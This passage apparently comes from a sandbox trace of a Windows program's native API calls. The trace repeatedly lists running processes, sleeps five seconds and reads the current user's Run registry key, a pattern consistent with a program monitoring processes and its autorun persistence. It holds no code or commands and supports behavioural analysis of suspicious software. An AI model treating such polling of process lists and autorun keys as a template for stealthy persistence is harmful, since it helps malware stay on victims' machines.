BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0178.014] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0178.016] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0178.017] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0178.029] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0178.029] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0178.029] NtClose (Handle=0x154) returned 0x0 [0178.029] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0178.029] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0178.030] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0178.030] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0178.030] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0178.032] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0178.033] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0178.043] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0178.043] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0178.043] NtClose (Handle=0x154) returned 0x0 [0178.043] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0178.044] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0178.044] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0178.045] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0178.045] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0178.047] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0178.048] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0178.059] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0178.059] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0178.059] NtClose (Handle=0x154) returned 0x0 [0178.060] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0178.060] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0178.061] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0178.061] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0178.062] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0178.065] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0178.065] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0178.074] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0178.074] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0178.075] NtClose (Handle=0x154) returned 0x0 [0178.075] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0178.075] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0178.076] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0178.076] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0178.076] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0178.081] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0178.082] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0178.090] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0178.090] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0178.090] NtClose (Handle=0x154) returned 0x0 [0178.090] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0178.091] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0178.091] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0178.092] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0178.092] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0178.094] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0178.094] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0178.106] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0178.106] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0178.106] NtClose (Handle=0x154) returned 0x0 [0178.106] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0178.107] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0178.107] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0178.108] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0178.108] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0178.110] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0178.110] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0178.121] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0178.121] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0178.121] NtClose (Handle=0x154) returned 0x0 [0178.121] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0178.122] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0178.122] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0178.122] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0178.123] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0178.125] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0178.125] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0178.138] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0178.138] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0178.138] NtClose (Handle=0x154) returned 0x0 [0178.138] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0178.138] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0178.139] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0178.139] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0178.139] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0178.142] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0178.142] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0178.152] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0178.153] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0178.153] NtClose (Handle=0x154) returned 0x0 [0178.153] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0178.153] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0178.154] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0178.155] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0178.155] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0178.158] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0178.159] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0178.168] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0178.168] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0178.168] NtClose (Handle=0x154) returned 0x0 [0178.168] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0178.169] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0178.169] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0178.170] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0178.170] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0178.172] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0178.173] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0178.186] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0178.186] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0178.186] NtClose (Handle=0x154) returned 0x0 [0178.186] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0178.186] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0178.187] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0178.187] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0178.187] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0178.189] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0178.190] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0178.236] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0178.236] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0178.236] NtClose (Handle=0x154) returned 0x0 [0178.236] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0178.236] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0178.237] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0178.237] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0178.237] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0178.239] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0178.240] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0178.248] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0178.248] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0178.248] NtClose (Handle=0x154) returned 0x0 [0178.248] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0178.249] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0178.249] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0178.249] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0178.250] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0178.252] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0178.252] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0178.261] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 